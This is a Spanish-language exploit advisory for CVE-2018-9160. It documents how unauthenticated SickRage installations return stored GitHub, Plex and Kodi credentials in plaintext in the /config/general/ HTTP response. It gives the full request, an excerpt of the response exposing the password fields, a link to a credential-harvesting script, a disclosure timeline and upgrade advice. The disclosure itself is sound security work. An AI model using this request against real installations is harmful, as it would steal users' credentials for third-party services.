
CVE-2018-9160
Título del Exploit: Credenciales en texto claro en la respuesta HTTP de SickRage
Fecha: 2018-04-01
Autor del Exploit: Sven Fassbender
Contacto: https://twitter.com/mezdanak
Página del proveedor: https://sickrage.github.io
Enlace del software: https://github.com/SickRage/SickRage
Versión: < v2018.03.09-1
CVE : CVE-2018-9160
Categoría: webapps
"SickRage es un administrador automático de videotecas para programas de televisión.
Observa los nuevos episodios de tus programas favoritos y, cuando se publican, hace su magia:
búsqueda automática de torrents/nzb, descarga y procesamiento en las calidades que desees." --extracto de https://sickrage.github.io
SickRage devuelve credenciales en texto claro para, por ejemplo, GitHub, AniDB, Kodi, Plex, etc., en respuestas HTTP.
El requisito previo es que el usuario no haya establecido un nombre de usuario y contraseña para su instalación de SickRage. (no es obligatorio, por defecto)
Solicitud HTTP:
GET /config/general/ HTTP/1.1
Host: 192.168.1.13:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.13:8081/config/backuprestore/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Respuesta HTTP:
HTTP/1.1 200 OK
Content-Length: 113397
Vary: Accept-Encoding
Server: TornadoServer/4.5.1
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"
Date: Fri, 02 Mar 2018 10:47:51 GMT
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="nl_NL">
<head>
[...]
<input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />
[...]
<input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />
[...]
</div>
</body>
</html>
https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py
[2018-03-07] Vulnerabilidad descubierta
[2018-03-08] Proveedor contactado
[2018-03-08] Proveedor respondió
[2018-03-09] Vulnerabilidad corregida. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)
Actualice la instalación de SickRage a v2018.03.09-1 o posterior.
Proteja el acceso a la aplicación web con credenciales de usuario adecuadas.